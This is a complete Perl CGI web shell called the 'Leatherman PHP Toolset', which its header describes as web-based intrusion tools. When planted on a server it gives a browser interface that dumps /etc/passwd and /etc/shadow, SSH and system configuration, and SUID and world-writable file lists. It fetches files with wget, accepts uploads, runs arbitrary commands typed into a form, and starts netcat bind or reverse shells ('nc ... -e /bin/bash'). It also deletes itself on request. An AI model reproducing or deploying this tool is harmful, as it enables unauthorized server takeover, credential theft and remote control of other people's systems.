#!/usr/bin/perl -w 
use strict;
use CGI;
use Apache::Util;

	 
#################################################
# 	Leatherman PHP Toolset 1.0		#
#	Web based intrusion tools.		#
#						#
#	by nummish <nummish AT 0x90.org>	#
#						#
#	SEE LICENSE.TXT FOR LICENSE DETAILS	#
#						#
#	Shoutouts, Greetz & Big-ups to:		#
# 	TCroc, thefed, Xeron, fignutz		#
################################################# 

my $cgi = new CGI;

use constant OS_LINUX => 1;
use constant OS_BSD => 2;
use constant OS_SOLARIS => 3;
use constant OS_AIX => 4;

my $URLFilename; my $LocalFilename;
my $DISABLED; my $LocalAddy;
my $OS_Type;


$URLFilename = $ENV{'SCRIPT_NAME'};
$LocalFilename = $ENV{'SCRIPT_FILENAME'};
$DISABLED = "false";
$LocalAddy = $ENV{'SERVER_NAME'};

$OS_Type = &getOSType;

# {{{ Cheap OS Detection 
sub getOSType()
{
	my ($KernelString);

	$KernelString = `uname -a`;

	if ($KernelString =~ /linux/i)
	{
		return OS_LINUX;
	}
	elsif ($KernelString =~ /bsd/i)
	{
		return OS_BSD;
	}
	elsif ($KernelString =~ /(sunos)|(solaris)/i)
	{
		return OS_SOLARIS;
	}
	elsif ($KernelString =~ /aix/i)
	{
		return OS_AIX;
	}

# By Default assume linux
	return OS_LINUX;
}
# }}}

# {{{ Parse out HTML Special characters
sub htmlspecialchars
{
	my (@retVal, $ctr);
	$ctr = 0;
	
	foreach (@_)
	{
		s/&/&amp;/g;
		s/</&lt;/g;
		s/>/&gt;/g;
		$retVal[$ctr] = $_;
		$ctr = $ctr + 1;
	}
	return @retVal;
}
# }}}

print $cgi->header();

print <<EndOfHTML;
<html>
	<head>
		<title>Leatherman PHP Toolset</title>

		<style>
			body{background-color: #225266;}
			div{background-color: #ACD4E6; border: 4px inset #006B99; padding: 3px;}
			a {color: #006b99;}
			a:visited {color: #006b99;}
		</style>
	</head>

	<body>

		<div><b>Leatherman PHP Toolset</b></div>
		<br />

	<table>
		<tr>
			<td valign="top" height="100%" nowrap>

<div>
<b><u>Navigation</u></b><br/>
<a href="#HostInfo">Kernel/Host 411</a><br /><a href="#InitFiles">Init/Conf Files</a><br />
<a href="#DiskInfo">Disk Info</a><br /><a href="#Routing">Routing / Ethernet</a><br />
<a href="#wget">wget Functions</a><br /><a href="#UserList">User List</a><br />
<a href="#netcat">netcat Functions</a><br /><a href="#CLI">CLI</a><br />
<a href="#FileUpload">File Upload</a><br /><a href="#ProcessList">Process List</a><br />
<a href="#NetworkSvcs">Network Svcs</a><br /><a href="#Remove">Remove</a><p></p>
</div>

		</td>
		<td width="100%">
EndOfHTML

# {{{ Disable routine 
	
	# This section is so I can keep a safe copy on my server

	if ($DISABLED ne "false")
	{
		print "<div>Leatherman has been disabled on this server</div>";
		exit;
	}
	
# }}} 


print "<a name=\"HostInfo\"></a>\n";
# {{{ Kernel Version / Host Information 
print "	<div>
<form action=\"$URLFilename\" method=\"post\">
<b>Kernel Version / Host Information:</b>";

# // print the kernel version
print "<pre>";
system("uname -a");
print "Distro Release Info: " . `cd /etc;cat *-release`;
print "Webserver running as: " . `whoami`;
print "Compiler version: " . `cc -dumpversion`;
print "Uptime: " . `uptime`;
print "</pre>";
print "motd: \n<pre>" . `cat /etc/motd`;
print "</pre>";

if ($OS_Type == OS_LINUX || $OS_Type == OS_SOLARIS)
{
	print "Issue: \n<pre>" . `cat /etc/issue`;
	print "</pre>";
	print "Issue.net: \n<pre>" . `cat /etc/issue.net`;
}

if ($OS_Type == OS_SOLARIS)
{
	print "System: \n<pre>" . `cat /etc/system`;
	print "</pre>Kernel Patches:<br /><pre>";
	print &htmlspecialchars(`cat /var/sadm/patch/.patchDB`);
	print "</pre>";
	if($cgi->param('submit') eq "Dump eeprom")
	{
		print "<pre>"; print &htmlspecialchars(`eeprom`);  print "</pre>";
	}
	else
	{
		print "<input type=\"submit\" name=\"submit\" value=\"Dump eeprom\" />";
	}
}

if ($OS_Type == OS_LINUX || $OS_Type == OS_BSD)
{
	if ($cgi->param('submit') eq "Display Kernel Parameters")
	{
		print "Kernel Parameters:<pre>"; print &htmlspecialchars(`sysctl -a`); print  "</pre>";
	}
	else
	{
		print "<input type=\"submit\" name=\"submit\" value=\"Display Kernel Parameters\" />";
	}
}
print "</form>
</div>";
# }}} 

print "<a name=\"InitFiles\"></a>\n";
# {{{ Init Files
print "	<div>
<form action=\"$URLFilename\" method=\"post\">\n<b>Initialization Files</b>\n<br />";

if ($OS_Type == OS_LINUX || $OS_Type == OS_BSD)
{
	print "Sysctl.conf:<br /><pre>";
	system("cat /etc/sysctl.conf");
	print "</pre>";
	my ($CronAllow, $CronDeny);
	$CronAllow = `cat /etc/cron.allow`;
	$CronDeny = `cat /etc/cron.deny`;
	if ($CronAllow ne "" || $CronDeny ne "")
	{
		print "Cron Settings:<br /><pre>";
		if ($CronAllow ne "") 
		{ print "cron.allow\n" . $CronAllow; }
		if ($CronDeny ne "") 
		{ print "cron.deny\n" . $CronDeny; }
		print "</pre>";
	}
}

# On BSD login.defs == login.conf
if ($cgi->param('submit') eq "Dump inetd.conf")
{
	print "<input type=\"submit\" name=\"submit\" value=\"Dump Syslog Config\" />";
	if ($OS_Type == OS_LINUX || $OS_Type == OS_BSD)
	{
		if ($OS_Type == OS_LINUX)
		{
			print "<input type=\"submit\" name=\"submit\" value=\"Dump xinetd.conf\" />";
		}
		print "<input type=\"submit\" name=\"submit\" value=\"Dump login.defs\" />";
	}
	print "<br />Inetd.conf:<br /><pre>";
	system("cat /etc/inetd.conf");
	print "</pre>";

}
elsif ($cgi->param('submit') eq "Dump xinetd.conf")
{
	print "<input type=\"submit\" name=\"submit\" value=\"Dump Syslog Config\" />";
	print "<input type=\"submit\" name=\"submit\" value=\"Dump inetd.conf\" />";
	if ($OS_Type == OS_LINUX || $OS_Type == OS_BSD)
	{
		print "<input type=\"submit\" name=\"submit\" value=\"Dump login.defs\" />";
	}
	print "<br />Xinetd.conf:<br /><pre>";
	system("cat /etc/xinetd.conf");
	print "</pre>";

}
elsif ($cgi->param('submit') eq "Dump login.defs")
{
	print "<input type=\"submit\" name=\"submit\" value=\"Dump Syslog Config\" />";
	print "<input type=\"submit\" name=\"submit\" value=\"Dump inetd.conf\" />";
	if ($OS_Type == OS_LINUX)
	{
		print "<input type=\"submit\" name=\"submit\" value=\"Dump xinetd.conf\" />";
	}
	print "<br />Login.defs:<br /><pre>";
	if ($OS_Type == OS_LINUX)
	{
		system("cat /etc/login.defs");
	}
	elsif ($OS_Type == OS_BSD)
	{
		system("cat /etc/login.conf");
	}
	print "</pre>";
}
elsif ($cgi->param('submit') eq "Dump Syslog Config")
{
	print "<input type=\"submit\" name=\"submit\" value=\"Dump inetd.conf\" />";
	if ($OS_Type == OS_LINUX || $OS_Type == OS_BSD)
	{
		if ($OS_Type == OS_LINUX)
		{
			print "<input type=\"submit\" name=\"submit\" value=\"Dump xinetd.conf\" />";
		}
		print "<input type=\"submit\" name=\"submit\" value=\"Dump login.defs\" />";
	}
	print "<br />Syslog Config:<br /><pre>";
	system("cat /etc/syslog.conf");
	print "</pre>";
}
else
{
	print "<input type=\"submit\" name=\"submit\" value=\"Dump Syslog Config\" />";
	print "<input type=\"submit\" name=\"submit\" value=\"Dump inetd.conf\" />";
	if ($OS_Type == OS_LINUX || $OS_Type == OS_BSD)
	{
		if ($OS_Type == OS_LINUX)
		{
			print "<input type=\"submit\" name=\"submit\" value=\"Dump xinetd.conf\" />";
		}
		print "<input type=\"submit\" name=\"submit\" value=\"Dump login.defs\" />";
	}
}


print "		</form>
</div>\n";
# }}}	

print "<a name=\"DiskInfo\"></a>\n";
#  {{{ Host Disk Info 
	print "		<div>
		<form action=\"$URLFilename\" method=\"post\">
		<b>Host Disk Information:</b>\n";

	print "<pre>";
	if ($OS_Type == OS_LINUX || $OS_Type == OS_BSD) 
	{
		print "\nfstab:\n";
		system("cat /etc/fstab");
		print "\n";
		system("df -h");
	}
	else
	{
		print "\nvfstab:\n";
		system("cat /etc/vfstab");
		print "\n";
		system("df -k");
	}

	print "\nMount Points:\n";
	system("mount");
	print "</pre>";

	if ($OS_Type == OS_SOLARIS || $OS_Type == OS_BSD|| $OS_Type == OS_LINUX)
	{
		if ($cgi->param('submit') eq "List Package Info")
		{
			if ($OS_Type == OS_SOLARIS) 
			{
				print "Package Info:\n<pre>" . `pkginfo -i` . "</pre>\n";
			}
			elsif ($OS_Type == OS_BSD) 
			{
				print "Package Info:\n<pre>" . `pkg_info` . "</pre>\n";
			}
			elsif ($OS_Type == OS_LINUX)
			{
				print "Package Info:\n<pre>" . `rpm -qa` . "</pre>\n";
			}
		}
		else
		{
			print "<input type=\"submit\" name=\"submit\" value=\"List Package Info\" /><br />";
		}
	}

#  {{{ 
	if($cgi->param('submit') eq "Find World Writable Files and Dirs")
	{
		if ($OS_Type == OS_SOLARIS || $OS_Type == OS_AIX)
		{
			print "<input type=\"submit\" name=\"submit\" value=\"Find World Writable Files\" />";
		}
		print "<input type=\"submit\" name=\"submit\" value=\"Find SUID Files\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Find SGID Files\" />";
		print "<pre>"; print &htmlspecialchars(`find /! -type l -perm -0002`); print "</pre>";
	}
	elsif($cgi->param('submit') eq "Find World Writable Files")
	{
		print "<input type=\"submit\" name=\"submit\" value=\"Find World Writable Files and Dirs\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Find SUID Files\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Find SGID Files\" />";
		print "<pre>"; print &htmlspecialchars(`find / -type f -perm -0002 -ls`); print "</pre>";
	}
	elsif($cgi->param('submit') eq "Find SUID Files")
	{
		print "<input type=\"submit\" name=\"submit\" value=\"Find World Writable Files and Dirs\" />";
		if ($OS_Type == OS_SOLARIS || $OS_Type == OS_AIX)
		{
			print "<input type=\"submit\" name=\"submit\" value=\"Find World Writable Files\" />";
		}
		print "<input type=\"submit\" name=\"submit\" value=\"Find SGID Files\" />";
		print "<pre>"; print  &htmlspecialchars(`find / -type f -perm -2000 -ls`); print "</pre>";
	}
	elsif($cgi->param('submit') eq "Find SGID Files")
	{
		print "<input type=\"submit\" name=\"submit\" value=\"Find World Writable Files and Dirs\" />";
		if ($OS_Type == OS_SOLARIS || $OS_Type == OS_AIX)
		{
			print "<input type=\"submit\" name=\"submit\" value=\"Find World Writable Files\" />";
		}
		print "<input type=\"submit\" name=\"submit\" value=\"Find SUID Files\" />";
		print "<pre>"; print &htmlspecialchars(`find / -type f -perm -4000 -ls`); print "</pre>";
	}
	else
	{
		print "<input type=\"submit\" name=\"submit\" value=\"Find World Writable Files and Dirs\" />";
		if ($OS_Type == OS_SOLARIS || $OS_Type == OS_AIX)
		{
			print "<input type=\"submit\" name=\"submit\" value=\"Find World Writable Files\" />";
		}
		print "<input type=\"submit\" name=\"submit\" value=\"Find SUID Files\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Find SGID Files\" />";
	}


# }}} 
	print "<br /><br />\nMap Directories:<br />\n";


	if ($OS_Type == OS_LINUX || $OS_Type == OS_BSD)
	{
		print "<input type=\"submit\" name=\"submit\" value=\"List Root filepath\" />";
	}

	print "	<input type=\"submit\" name=\"submit\" value=\"List /etc contents\" >
		<input type=\"submit\" name=\"submit\" value=\"List /tmp contents\" >
		<input type=\"submit\" name=\"submit\" value=\"List /var contents\" >
		<br />
		<input type=\"submit\" name=\"submit\" value=\"List /bin contents\" >
		<input type=\"submit\" name=\"submit\" value=\"List /sbin contents\" >
		<input type=\"submit\" name=\"submit\" value=\"List /usr/bin contents\" >
		<input type=\"submit\" name=\"submit\" value=\"List /usr/sbin contents\" >\n";

	if ($cgi->param('submit') eq "List Root filepath")
	{
		print "Root Filepath:<pre>" . `ls -alR /` . "</pre>";
	}
	elsif ($cgi->param('submit') eq "List /etc contents")
	{
		print "/etc contents:<pre>" . `ls -alR /etc` . "</pre>";
	}
	elsif ($cgi->param('submit') eq "List /tmp contents")
	{
		print "/tmp contents:<pre>" . `ls -alR /tmp` . "</pre>";
	}	
	elsif ($cgi->param('submit') eq "List /bin contents")
	{
		print "/tmp contents:<pre>" . `ls -alR /bin` . "</pre>";
	}	
	elsif ($cgi->param('submit') eq "List /sbin contents")
	{
		print "/tmp contents:<pre>" . `ls -alR /sbin` . "</pre>";
	}	
	elsif ($cgi->param('submit') eq "List /usr/bin contents")
	{
		print "/tmp contents:<pre>" . `ls -alR /usr/bin` . "</pre>";
	}	
	elsif ($cgi->param('submit') eq "List /usr/sbin contents")
	{
		print "/tmp contents:<pre>" . `ls -alR /usr/sbin` . "</pre>";
	}	
	elsif ($cgi->param('submit') eq "List /var contents")
	{
		print "/tmp contents:<pre>" . `ls -alR /var` . "</pre>";
	}	


	print "	</form>\n</div>\n";
#  }}} 

print "<a name=\"Routing\"></a>\n";
# {{{ Routing Tables 
	print "	<div>\n<b>Routing Tables / Ethernet Configuration</b>\n<br />\n<form action=\"$URLFilename\" method=\"post\">\n";

	if($cgi->param('submit') eq "Dump hosts files")
	{
		print "hosts:\n<pre>"; print &htmlspecialchars(`cat /etc/hosts`);
		print "</pre>";
		print "hosts.allow:<pre>\n"; print &htmlspecialchars(`cat /etc/hosts.allow`);
		print "</pre>";
		print "hosts.deny:<pre>\n"; print &htmlspecialchars(`cat /etc/hosts.deny`);
		print "</pre>";
	}
	else
	{
		print "<input type=\"submit\" name=\"submit\" value=\"Dump hosts files\" />";
	}

	print "<pre>";
	system("netstat -rn");
	print "\n";
	system("ifconfig -a");
	print "\nARP Records:\n";
	if ($OS_Type == OS_LINUX)
	{
		system("arp -n");
	}
	elsif ($OS_Type == OS_BSD)
	{
		system("arp -an");
	}
	elsif ($OS_Type == OS_SOLARIS || $OS_Type == OS_AIX)
	{
		system("arp -a");
	}
	print "\n";
	print "</pre>";

	print "	</form>\n</div>\n";
# }}} 

print "<a name=\"wget\"></a>\n";
# {{{ wget Functions 
	print "<div>\n<b>wget Version:</b>\n";

	my $wget_output; my @wget_version_array;
	my $wget_version; 

	$wget_output = `wget -V`;
	@wget_version_array = split(/\n/, $wget_output);

	$wget_version = $wget_version_array[0];
	if ($wget_version eq "")
	{
		$wget_version = "[wget not installed]";
	}

	print "<pre>$wget_version</pre>\n";

	print "<form action=\"$URLFilename\" method=\"POST\">\n" 
		. "Address: <input type=\"text\" name=\"wgAddress\" size=\"30\" />\n"
		. "Save As: <input type=\"text\" name=\"wgSaveAs\" size=\"20\" />\n"
		. "<br />\n<input type=\"submit\" name=\"submit\" value=\"get file from www\" />\n"
		. "</form>\n";

	if ($cgi->param('submit') eq "get file from www")
	{
		my $WgetFile; my $WgetURL;

		$WgetFile = $cgi->param('wgSaveAs');
		$WgetURL = $cgi->param('wgAddress');

		print "<pre>";
		system("wget -v -O $WgetFile $WgetURL");
		print "</pre>\n";
	}

	print "</div>\n";
# }}} 

print "<a name=\"UserList\"></a>\n";
# {{{ User List 
	print "		<div>
		<form action=\"$URLFilename\" method=\"post\">
		<b>User List:</b><br />
		Who's online right now:<br />\n";

	print "<pre>";
	system("who");
	print "</pre>";

	if($cgi->param('submit') eq "Dump passwd")
	{
		print "<pre>"; print &htmlspecialchars(`cat /etc/passwd`); print "</pre>";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump shadow\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump group list\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump last logins\" />";
	}
	elsif($cgi->param('submit') eq "Dump shadow")
	{
		if ($OS_Type == OS_BSD)
		{
			print "<pre>"; print &htmlspecialchars(`cat /etc/master.passwd`); print "</pre>";
		}
		else
		{
			print "<pre>"; print &htmlspecialchars(`cat /etc/shadow`); print "</pre>";
		}
		print "<input type=\"submit\" name=\"submit\" value=\"Dump passwd\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump group list\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump last logins\" />";
	}
	elsif($cgi->param('submit') eq "Dump group list")
	{
		print "<pre>"; print &htmlspecialchars(`cat /etc/group`); print "</pre>";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump passwd\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump shadow\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump last logins\" />";
	}
	elsif($cgi->param('submit') eq "Dump last logins")
	{
		print "<pre>"; print &htmlspecialchars(`last`); print "</pre>";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump passwd\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump shadow\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump group list\" />";
	}
	else
	{
		print "<input type=\"submit\" name=\"submit\" value=\"Dump passwd\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump shadow\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump group list\" />";
		print "<input type=\"submit\" name=\"submit\" value=\"Dump last logins\" />";
	}

	print "</form>\n</div>\n";

# }}} 

print "<a name=\"netcat\"></a>\n";
# {{{ netcat related functions 
	print "<div>\n<b>netcat Version:</b>\n";

# print the netcat version  
	my $nc_output; my @nc_version_array;
	my $nc_version;

	$nc_output = ""; #Init the var
		$nc_output = `nc -h`;
	@nc_version_array = split(/\n/, $nc_output);

	$nc_version = $nc_version_array[0];
	if ($nc_version eq "")
	{
		$nc_version = "[netcat not installed]";
	}

	print "<pre>$nc_version</pre>";

	print "<br />\n<form action=\"$URLFilename\" method=\"post\">\n";
	print <<EndOfHTML2;
	<b>Run netcat bindshell</b><br /><br />
		Remember: <i>nc -vv -l -p &lt;Port Number&gt;</i> for reverse shell<br />
		<table>

		<tr>
		<td>
		Shell: <input type="text" name="ncShell" size="12" value="/bin/bash" />
		</td>
		<td align="center">
		Reverse Address:
		</td>
		</tr>

		<tr>
		<td>
		Port: <input type="text" name="ncPort" size="5" /> 
		</td>
		<td align="center">
		<input type="text" name="ncRemoteAddy" size="15" value="127.0.0.1" />
		</td>
		</tr>

		<tr>
		<td align="center">
		<input type="submit" name="submit" value="Bind netcat" />
		</td>
		<td align="center">
		<input type="submit" name="submit" value="Reverse Shell" />
		</td>
		</tr>
		</table>
EndOfHTML2

		my $BindPort; my $Shell; my $RemoteAddy;

	if($cgi->param('submit') eq "Bind netcat")
	{	
		$BindPort = $cgi->param('ncPort');
		$Shell = $cgi->param('ncShell');
		print "<pre>" . system("nc -l -p $BindPort -e $Shell") . "</pre>\n";
	}
	elsif($cgi->param('submit') eq "Reverse Shell")
	{
		$BindPort = $cgi->param('ncPort');
		$Shell = $cgi->param('ncShell');
		$RemoteAddy = $cgi->param('ncRemoteAddy');

		print "<pre>" . system("nc $RemoteAddy $BindPort -e $Shell") . "</pre>\n";
	}

	print "</form>\n</div>\n";

# }}} 

print "<a name=\"CLI\"></a>\n";
# {{{ Command Line Interface 	
	print "		<div>
		<b>Command Line Interface:</b><br/>

		<form action=\"$URLFilename\" method=\"POST\">
		<input type=\"text\" name=\"cliCommand\" size=\"50\" />
		<input type=\"submit\" name=\"submit\" value=\"Run Command\">
		<br />
		<input type=\"submit\" name=\"submit\" value=\"Dump set variables\">
		</form>\n";

	if ($cgi->param('submit') eq "Run Command")
	{
		my ($cli_command, $cli_result);
		print "<pre>";

		$cli_command = $cgi->param('cliCommand');
		print "Running: $cli_command\n";
		print &htmlspecialchars(`$cli_command`);
		print "</pre>";
	}
	elsif ($cgi->param('submit') eq "Dump set variables")
	{
		print "System SET Variables: \n<pre>" . `set` . "</pre>";
	}

	print "System Environment: \n<pre>" . `env` . "</pre>";

	print "		</div>\n";
# }}} 

print "<a name=\"FileUpload\"></a>\n";
# {{{ File Upload Routine 	

	print "<div>\n<b>Upload a File:</b><br/>\n"
		. "<form enctype=\"multipart/form-data\" action=\"$URLFilename\" method=\"POST\">\n"
		. "<input type=\"file\" name=\"filUpload\"  />\n"
		. "<input type=\"submit\" name=\"submit\" value=\"Upload File\">\n"
		. "<br />\nSave as:<input type=\"text\" name=\"filName\" size=\"30\" />\n"
		. "<br />\ncurrent path: ";
	system("pwd"); 
	print "</form>\n";

	if ($cgi->param('submit') eq "Upload File")
	{
		my $uploadfile; 

		$uploadfile = $cgi->param('filName');

		my $remotefilename = $cgi->param('filUpload');

		if ($uploadfile eq "")
		{
# strip the remote path and keep the filename
			$remotefilename=~m/^.*(\\|\/)(.*)/;
			$uploadfile = $2;
		}

		print "<pre>";

		open(LOCAL, ">$uploadfile") or die $!;
		while(<$remotefilename>) {
			print LOCAL $_;
		}

		print "</pre>\n";
	}
	print "</div>\n";
# }}}

print "<a name=\"ProcessList\"></a>\n";
# {{{ Process Listing 
	print "		<div>
		<b>Process Listing:</b><br />
		<form action=\"$URLFilename\" method=\"POST\">\n";

	if ($OS_Type == OS_LINUX) 
	{

		my ($AtAllow, $AtDeny);

		$AtAllow = `cat /etc/at.allow`;
		if ($AtAllow ne "")
		{

			print "	at.allow:
				<pre>
				$AtAllow
				</pre>\n";
		}	

		$AtDeny = `cat /etc/at.deny`;
		if ($AtDeny ne "")
		{
			print "		at.deny:\n<pre>\n";
			system("cat /etc/at.deny"); 
			print "		</pre>\n";

		}
	} 

	print "			<input type=\"submit\" name=\"submit\" value=\"Display Process Listing\" />\n";

	if($cgi->param('submit') eq "Display Process Listing")
	{
		print "<pre>";
		if ($OS_Type == OS_BSD)
		{
			print &htmlspecialchars(`ps aux`);
		}
		else
		{
			print &htmlspecialchars(`ps -eaf`);
		}
		print "</pre>";
	}


	print "</form>\n</div>\n";

# }}} 

print "<a name=\"NetworkSvcs\"></a>\n";
# {{{ Network Services 
	print "	<div>
		<b>Network Services</b>
		<form action=\"$URLFilename\" method=\"POST\">
		<input type=\"submit\" name=\"submit\" value=\"Display Network Status\" />\n";
	if ($OS_Type == OS_LINUX || $OS_Type == OS_BSD) 
	{ 
		print "	<input type=\"submit\" name=\"submit\" value=\"Dump Securetty\" />\n"
	} 

	print "	<input type=\"submit\" name=\"submit\" value=\"Dump SSH Config\" />
		<input type=\"submit\" name=\"submit\" value=\"Display RPC Info\" />\n";

	if($cgi->param('submit') eq "Display Network Status")
	{
		print "<pre>";
		print &htmlspecialchars(`netstat -an`);
		print "</pre>";
	}
	elsif($cgi->param('submit') eq "Dump Securetty")
	{
		print "<pre>";
		print `cat /etc/securetty`;
		print "</pre>";
	}
	elsif($cgi->param('submit') eq "Dump SSH Config")
	{
		print "<pre>";
		print &htmlspecialchars(`cat /etc/ssh/sshd_config`);
		print "</pre>";
	}
	elsif($cgi->param('submit') eq "Display RPC Info")
	{
		if ($OS_Type == OS_LINUX)
		{
			print "<pre>";
			print &htmlspecialchars(`rpcinfo -p localhost`);
			print "</pre>";
		}
		elsif ($OS_Type == OS_SOLARIS || $OS_Type == OS_AIX)
		{
			print "<pre>";
			print &htmlspecialchars(`rpcinfo`);
			print "</pre>";
		}

	}

	print "</form>\n</div>\n";

# }}} 

print "<a name=\"Remove\"></a>\n";
# {{{ Remove Leatherman 
	print "		<div>
		<form action=\"$URLFilename\" method=\"POST\">
		<input type=\"submit\" name=\"submit\" value=\"Remove Leatherman\" />\n";

	if($cgi->param('submit') eq "Remove Leatherman")
	{
		unlink($LocalFilename);
	}

	print "		</form>
		</div>\n";
# }}} 

print "</td>\n</tr>\n</table>\n</body>\n</html>";
